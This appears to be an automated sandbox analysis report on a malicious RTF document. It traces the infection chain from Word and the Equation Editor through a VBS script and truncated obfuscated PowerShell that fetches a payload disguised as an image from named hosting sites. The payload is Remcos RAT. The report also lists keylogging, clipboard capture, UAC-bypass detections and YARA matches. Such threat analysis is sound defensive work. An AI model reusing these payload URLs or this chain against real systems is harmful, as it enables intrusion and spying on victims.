                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
                      Source: wscript.exe, 00000005.00000003.400951239.0000000003540000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.0000000003540000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404639771.00000000003FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.402664845.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401153718.00000000003F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405142889.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405126319.00000000003FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/e1cCs
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/e1cCs5
                      Source: wscript.exe, 00000005.00000003.404639771.00000000003FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401153718.00000000003F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405126319.00000000003FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/e1cCsG
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                      Source: powershell.exe, 0000000A.00000002.446552841.000000000269A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
                      Source: powershell.exe, 0000000A.00000002.455161670.0000000004E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/00
                      Source: powershell.exe, 0000000A.00000002.455161670.0000000004E41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000002561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.446552841.000000000269A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                      Source: wscript.exe, 00000005.00000003.403024830.0000000003840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                      Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.22:49166 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000015_2_0040A2B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,15_2_0040B70E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_004168C1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,15_2_0040A3E0

                      E-Banking Fraud

                      Source: Yara matchFile source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.628166706.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3800, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED

                      System Summary

                      Source: nU7Z8sPyvf.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                      Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 3428, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: RegAsm.exe PID: 3800, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 8770
                      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}\ProgID
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '…
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and write
                      Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and write
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,15_2_004167B4
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_002754A010_2_002754A0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0027517210_2_00275172
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043E0CC15_2_0043E0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041F0FA15_2_0041F0FA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0045415915_2_00454159
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043816815_2_00438168
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004461F015_2_004461F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043E2FB15_2_0043E2FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0045332B15_2_0045332B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0042739D15_2_0042739D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004374E615_2_004374E6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043E55815_2_0043E558
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043877015_2_00438770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004378FE15_2_004378FE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043394615_2_00433946
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044D9C915_2_0044D9C9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00427A4615_2_00427A46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041DB6215_2_0041DB62
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00427BAF15_2_00427BAF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00437D3315_2_00437D33
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00435E5E15_2_00435E5E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00426E0E15_2_00426E0E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043DE9D15_2_0043DE9D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00413FCA15_2_00413FCA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00436FEA15_2_00436FEA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E10 appears 54 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434770 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                      Source: nU7Z8sPyvf.rtf, type: SAMPLE | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                      Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 3428, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: RegAsm.exe PID: 3800, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engine | Classification label: mal100.spre.troj.spyw.expl.evad.winRTF@14/20@6/5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$7Z8sPyvf.rtf
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-999Z97
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR72CE.tmp
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs"
                      Source: C:\Windows\SysWOW64\cmd.exe | Console Write: ................................s.l.m.g.r...v.b.s...............0.......`N................................................................6.....
                      Source: C:\Windows\SysWOW64\cmd.exe | Console Write: ................................w.i.n.r.m...v.b.s...............0.......fN................................................................6.....
                      Source: C:\Windows\SysWOW64\cmd.exe | Console Write: ................................ . . . . . . . .1. .f.i.l.e.(.s.). .c.o.p.i.e.d...........6.............................6.................6.....
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: nU7Z8sPyvf.rtf | ReversingLabs: Detection: 63%
                      Source: nU7Z8sPyvf.rtf | Virustotal: Detection: 56%
                      Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs"
